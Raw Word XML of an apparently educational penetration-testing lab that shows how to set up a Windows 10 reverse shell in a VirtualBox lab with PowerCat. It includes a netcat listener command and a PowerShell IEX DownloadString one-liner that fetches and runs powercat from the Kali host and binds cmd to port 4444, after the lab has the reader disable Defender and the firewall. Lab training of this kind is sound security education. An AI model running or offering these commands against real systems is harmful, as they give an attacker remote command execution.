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914D" w14:textId="2F800C36" w:rsidR="00A66F1D" w:rsidRDefault="006C48C6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C48C6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="006C48C6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Create a</w:t>
      </w:r>
      <w:r w:rsidR="00351BBE">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C27C82">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="006C48C6">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:r w:rsidR="00351BBE">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005A7239">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="00351BBE">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD00D98" w14:textId="69F3A73F" w:rsidR="006C48C6" w:rsidRDefault="006C48C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C48C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF7E02" w14:textId="1BF854EB" w:rsidR="00897CF3" w:rsidRDefault="00E91C6B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this short lab, you will learn how to </w:t>
      </w:r>
      <w:r w:rsidR="00FE5E8B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>copy data quickly and easily</w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from your Kali attack machine to a compromised Windows machine. Secondly, you will learn how to </w:t>
      </w:r>
      <w:r w:rsidR="005A7239">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">create a Windows reverse shell using PowerShell and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91C6B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91C6B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidR="00351BBE">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43640935" w14:textId="7B432162" w:rsidR="006C48C6" w:rsidRDefault="00351BBE">
      <w:pPr>
        <w:rPr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PowerCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell module</w:t>
      </w:r>
      <w:r w:rsidR="00E91C6B" w:rsidRPr="00E91C6B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A7239">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>extends the function</w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ality</w:t>
      </w:r>
      <w:r w:rsidR="005A7239">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00E91C6B" w:rsidRPr="00E91C6B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Netcat &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E91C6B" w:rsidRPr="00E91C6B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A7239">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00E91C6B" w:rsidRPr="00E91C6B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all recent versions of Microsoft Windows. It accomplishes this goal by using native PowerShell version 2 components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB60BB" w14:textId="4B42F1A1" w:rsidR="00C20D8D" w:rsidRDefault="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C9CE8" w14:textId="12E05699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install of VirtualBox to include the extension pack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F28940" w14:textId="1CF8E11A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virtual install of Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94E200" w14:textId="2AA774E7" w:rsid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 xml:space="preserve">Once virtual install of Windows 10. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C7ED5" w14:textId="17AF0A7A" w:rsidR="00C20D8D" w:rsidRDefault="00C20D8D" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ensure that your</w:t>
      </w:r>
      <w:r w:rsidR="0053670E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> install K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ali and Windows 10 target have both of their VirtualBox network adapters set to NAT network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7645283F" w14:textId="33127D5B" w:rsidR="00C20D8D" w:rsidRDefault="00C20D8D" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Your Windows 10 machine will need </w:t>
      </w:r>
      <w:r w:rsidR="0053670E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>made vulnerable for this lab to work. Windows Defender, real tine virus scan</w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and your Windows firewall will stop this lab from working. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E11786" w14:textId="13D627C5" w:rsidR="0053670E" w:rsidRDefault="0053670E" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053670E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Begin the Lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C05BCD" w14:textId="6B35F04C" w:rsidR="0053670E" w:rsidRDefault="0053670E" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053670E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From your Kali Desktop, </w:t>
      </w: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anywhere and from the conte</w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t menu, select Create Folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42E60D" w14:textId="2FE9D9E2" w:rsidR="0053670E" w:rsidRDefault="0053670E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6A367C3" wp14:editId="46265FF3">
            <wp:extent cx="1657350" cy="10147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261" cy="1017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87530" w14:textId="0F508401" w:rsidR="0053670E" w:rsidRDefault="0053670E" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name the folder PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66488403" w14:textId="26B45553" w:rsidR="00381993" w:rsidRDefault="00381993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983262B" wp14:editId="6AA0FFF2">
            <wp:extent cx="2466975" cy="1249301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821" cy="125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A21C6" w14:textId="3113DC03" w:rsidR="00381993" w:rsidRDefault="00381993" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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on the folder</w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and from the context menu, select </w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open Terminal Here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8119E" w14:textId="3D87E95D" w:rsidR="00381993" w:rsidRDefault="00381993" w:rsidP="00C20D8D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0B0CC2D6" wp14:editId="31D8934A">
            <wp:extent cx="1685925" cy="1066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077B1" w14:textId="5E3FD2B5" w:rsidR="00381993" w:rsidRDefault="00381993" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00897CF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Download Powercat from GitHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51833F8C" w14:textId="0896040D" w:rsidR="00381993" w:rsidRDefault="00381993" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">your Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>terminal, type o</w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy and paste the following command at the </w:t>
      </w:r>
      <w:r w:rsidR="0064567D">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>terminal prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50335062" w14:textId="00E6D3A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proofErr w:type="spellStart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>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00264966">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4A21D" w14:textId="35BBED94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59625B4" w14:textId="1B05261B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r w:rsidRPr="0064567D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B52C9F" wp14:editId="2329F0BC">
            <wp:extent cx="5943600" cy="6089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38A10" w14:textId="5E3ED981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2C2B007B" w14:textId="70F801E5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64567D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64567D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64567D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DAB52" w14:textId="0B524FD2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CCD579" w14:textId="2FB2B10F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14996D13" wp14:editId="12D8D146">
            <wp:extent cx="5943600" cy="1343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F38BB" w14:textId="77777777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E1567F2" w14:textId="5EFA93A9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The powercat.ps1 file was saved to your working folder, PowerShell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFFA2EB" w14:textId="6319FA1E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69D4E8D" w14:textId="589B46C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CA0069F" wp14:editId="5A899241">
            <wp:extent cx="4600575" cy="140818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467" cy="141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782BB" w14:textId="06EAC194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710F7DF" w14:textId="09C41C9D" w:rsidR="00C05D2A" w:rsidRPr="00C05D2A" w:rsidRDefault="00C05D2A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05D2A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the Python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C05D2A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29C45CFF" w14:textId="758427E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FAD6E0" w14:textId="64BDB37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Back at your </w:t>
      </w:r>
      <w:r w:rsidR="00897CF3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ali terminal, type or copy in the following Python command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C60EAB" w14:textId="232D8120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3BF7BA6" w14:textId="0741C1F7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python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BAE020" w14:textId="1C34D25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177101B" w14:textId="61C18DA7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C05D2A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C05D2A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C05D2A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59643528" w14:textId="7458122D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1BE2F99" w14:textId="0D1BBEDF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An HTTP server is now running inside your working folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C763831" w14:textId="5E569F1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C214557" w14:textId="0C7B970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54239322" wp14:editId="36CC698F">
            <wp:extent cx="4238625" cy="10858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D443D" w14:textId="0FC7057E" w:rsidR="00B74C49" w:rsidRDefault="00B74C49" w:rsidP="0064567D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74C49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Start a Netcat listener on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A6AF8" w14:textId="77777777" w:rsidR="00B74C49" w:rsidRPr="00B74C49" w:rsidRDefault="00B74C49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</w:p>
    <w:p w14:paraId="7C5CAE3E" w14:textId="5C99DB34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Open new Kali terminal. At the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type the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE31F8C" w14:textId="2A3E15C0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BC3E95" w14:textId="008190A6" w:rsidR="00B74C49" w:rsidRDefault="00B74C4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nc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-</w:t>
      </w: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vlp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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0596E37C" w14:textId="08A1C1DA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09670D7" w14:textId="1FB0781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szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0FAA95" w14:textId="23100DA4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9E81BA1" w14:textId="4FFAF6AC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323FE421" wp14:editId="6233B9EE">
            <wp:extent cx="3219450" cy="1285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5FDCC" w14:textId="2ED671E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73DB877F" w14:textId="0B650735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D57039">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Leave the terminal up. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD23FB1" w14:textId="45E22F0F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134306A" w14:textId="1B6A1A1C" w:rsidR="00C27C82" w:rsidRPr="00C27C82" w:rsidRDefault="00C27C82" w:rsidP="00B74C49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27C82">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Launch the Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B6944" w14:textId="26D2395C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EF4839" w14:textId="33B89061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From your Windows 10 target, click the start button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in the search box, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007552B7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007552B7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Command Prompt.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">  From the results, click on </w:t>
      </w:r>
      <w:r w:rsidR="007552B7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Command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from the right Windowpane, click on Run as administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E9848A" w14:textId="0E8E98E6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0F8C5F4A" w14:textId="5078643C" w:rsidR="00D57039" w:rsidRDefault="00611531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498ACFE2" wp14:editId="2873E1C6">
            <wp:extent cx="3943350" cy="25128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252" cy="252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A3740" w14:textId="5E1669D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CE743E9" w14:textId="187CF97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lastRenderedPageBreak/>
        <w:t xml:space="preserve">At the command prompt on your Windows 10 target, copy and paste the following command. This is my IP </w:t>
      </w:r>
      <w:r w:rsidR="005E319B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>address;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> your Kali IP address will differ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903BCF0" w14:textId="1F742F63" w:rsidR="00660EC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A61D29" w14:textId="59701925" w:rsidR="00660EC9" w:rsidRDefault="00660EC9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powershell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c "IEX(New-Object System.Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24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/powercat.ps1');powercat -c </w:t>
      </w:r>
      <w:r w:rsidRPr="005E319B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow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p 4444</w:t>
      </w:r>
      <w:r w:rsidR="00BD0185">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e</w:t>
      </w:r>
      <w:r w:rsidR="00FF34D3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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF34D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>cmd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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED344A6" w14:textId="79FD6DFE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A719360" w14:textId="15C9095A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27C82"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04E27BDF" wp14:editId="640ABF98">
            <wp:extent cx="5943600" cy="11626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87A91" w14:textId="1502E159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50CC740F" w14:textId="1B81C80C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5E319B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5E319B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5E319B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE43698" w14:textId="3A0F54F0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93A4E5B" w14:textId="6457086E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Return to your listener running on your Kali machine. You should now see the same command prompt you have launched on your Windows 10 target. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F0A69"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 w:rsidR="006F0A69">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> must be left running on the target to maintain the reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774C784" w14:textId="4616D843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5735CDA" w14:textId="16A719D1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68C401CD" wp14:editId="19AD1DE7">
            <wp:extent cx="5934710" cy="42443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214C" w14:textId="51882731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D32161B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5460AF" w14:textId="7586D748" w:rsidR="00DF04A0" w:rsidRPr="00DF04A0" w:rsidRDefault="00DF04A0" w:rsidP="005E319B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DF04A0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 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDDE51" w14:textId="36469854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0F7ABC7" w14:textId="760216CF" w:rsidR="00DF04A0" w:rsidRDefault="00897CF3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 lot is</w:t>
      </w:r>
      <w:r w:rsidR="00DF04A0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> happening in this lab. Firs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 xml:space="preserve">you learned how to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>quickly and easily</w:t>
      </w:r>
      <w:r w:rsidR="00DF04A0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy files, tools, or scripts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DF04A0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> from your Kali machine over to a compromised Windows targe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even as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">low-level </w:t>
      </w:r>
      <w:r w:rsidR="00DF04A0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">user. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
